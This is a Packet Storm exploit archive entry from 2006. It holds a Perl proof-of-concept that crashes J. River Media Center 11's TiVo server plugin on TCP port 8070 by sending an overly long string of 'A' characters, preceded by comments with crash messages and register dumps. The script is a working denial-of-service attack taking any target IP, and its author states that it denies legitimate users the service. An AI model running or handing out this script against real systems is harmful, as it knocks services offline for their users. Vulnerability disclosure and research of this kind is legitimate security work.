jriver.txt

2006-09-07T00:00:00
ID PACKETSTORM:49720
Type packetstorm
Reporter n00b
Modified 2006-09-07T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
##Credit to n00b for finding this bug..^ ^  
############################################################################  
#Media Center 11 d0s exploit overly long string.  
#TiVo server plugin..Runs on port tcp :8070  
#Also J. River UPnP Server Version 1.0.34  
#is also afected by the same bug which is just a  
#dos exploit.As we know the port always changes for the  
#UPnP server so you may have to modify the proof of concept a little  
#This exploit will deny legitimate user's from using the service  
#We should see a error with the following msg Upon sucsessfull exploitation.  
#All 3 of the server plugin's will fail includin the library server which  
#is set to port :80 by default.The only debug info i was able to collect  
#at crash time is also provided with the proof of concept.  
#As you can see from the debug info provided we canot control any memory  
#Adresses.  
#Shout's to aelph and every-one who has helped me over the year's.  
#############################################################################  
# X Microsoft Visual C ++ Runtime Library  
#  
# Buffer overrun detected!  
#  
# C:\Program Files\J River\Media Center 11\Media center.exe  
#  
# A Buffer overrun has been detected which has corrupted the program's  
# internal state. The program cannot safely continue execution and must  
# be now terminated.  
# Bah fucking shame..  
##############################################################################  
#o/s info: win xp sp.2 Media Center 11.0.309 (not registered)  
# \\ DEBUG INFO //  
#  
#eax=77c26ed2 ebx=00000000 ecx=77c1129c edx=00000000 esi=77f7663e edi=00000003  
#eip=7ffe0304 esp=01b7e964 ebp=01b7ea5c iopl=0 nv up ei pl nz na  
pe nc  
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202  
#SharedUserData!SystemCallStub+0x4:  
#7ffe0304 c3 ret  
##############################################################################  
  
print "Media Center 11.0.309 Remote d0s J River TiVo server all 3 plugin's are vuln by n00b \n";  
  
use IO::Socket;  
  
$ip = $ARGV[0];  
  
$payload = "\x41"x5500;  
  
if(!$ip)  
{  
  
die "you forgot the ip dumb nut\n";  
  
}  
  
$port = '8070';  
  
$protocol = 'tcp';  
  
  
$socket = IO::Socket::INET->new(PeerAddr=>$ip,  
PeerPort=>$port,  
Proto=>$protocol,  
Timeout=>'1') || die "Make sure service is running on the port\n";  
  
  
print $socket $payload;  
  
close($socket);  
  
  
`